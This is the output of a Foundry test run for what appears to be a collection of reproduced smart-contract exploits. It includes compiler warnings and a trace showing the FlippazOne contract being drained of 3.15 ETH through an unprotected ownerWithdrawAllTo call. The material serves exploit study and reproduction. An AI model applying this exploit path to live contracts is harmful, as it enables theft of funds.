Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 541.20ms (1.78ms CPU time)

Ran 1 test for src/test/2022-07/FlippazOne_exp.sol:ContractTest
[PASS] testExploit() (gas: 137009)
Logs:
  Before exploiting, ETH balance of FlippazOne Contract:: 1150000000000000000
  After bidding, ETH balance of FlippazOne Contract:: 3150000000000000000
  After exploiting, ETH balance of FlippazOne Contract:: 0
  ETH balance of attacker Alice:: 3150000000000000000

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15083765 [1.508e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [137009] ContractTest::testExploit()
    ├─ [0] VM::addr(<pk>)
    │   └─ ← [Return] 0x7E5F4552091A69125d5DfCb7b8C2659029395Bdf
    ├─ emit log_named_uint(key: "Before exploiting, ETH balance of FlippazOne Contract:", val: 1150000000000000000 [1.15e18])
    ├─ [0] VM::prank(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38])
    │   └─ ← [Return]
    ├─ [98225] 0xE85A08Cf316F695eBE7c13736C8Cc38a7Cc3e944::bid{value: 2000000000000000000}()
    │   ├─  storage changes:
    │   │   @ 19: 0x0000000000000000000000000000000000000000000000000ff59ee833b30000 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   │   @ 20: 0x000000000000000000000000194a39f48f1d5e310d0e0cc25e727c7d2bff0b14 → 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   @ 0x77f34a924da37c02f97cde05c2e61c54480b6734bf71537f927a5b2904a97335: 0 → 1
    │   │   @ 26: 1 → 2
    │   │   @ 0x944998273e477b495144fb8794c914197f3ccb46be2900f4698fd0ef743c9696: 0 → 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   @ 25: 1 → 2
    │   │   @ 0x577ed4caad6e36cb72a16e0c3d80594ae3e888628589ecdeff83fb1f1abd99cf: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   └─ ← [Stop]
    ├─ emit log_named_uint(key: "After bidding, ETH balance of FlippazOne Contract:", val: 3150000000000000000 [3.15e18])
    ├─ [9816] 0xE85A08Cf316F695eBE7c13736C8Cc38a7Cc3e944::ownerWithdrawAllTo(0x7E5F4552091A69125d5DfCb7b8C2659029395Bdf)
    │   ├─ [0] 0x7E5F4552091A69125d5DfCb7b8C2659029395Bdf::fallback{value: 3150000000000000000}()
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ emit log_named_uint(key: "After exploiting, ETH balance of FlippazOne Contract:", val: 0)
    ├─ emit log_named_uint(key: "ETH balance of attacker Alice:", val: 3150000000000000000 [3.15e18])
    ├─  storage changes:
    │   @ 0x944998273e477b495144fb8794c914197f3ccb46be2900f4698fd0ef743c9696: 0 → 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.45s (3.13s CPU time)

Ran 2 test suites in 4.46s (4.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
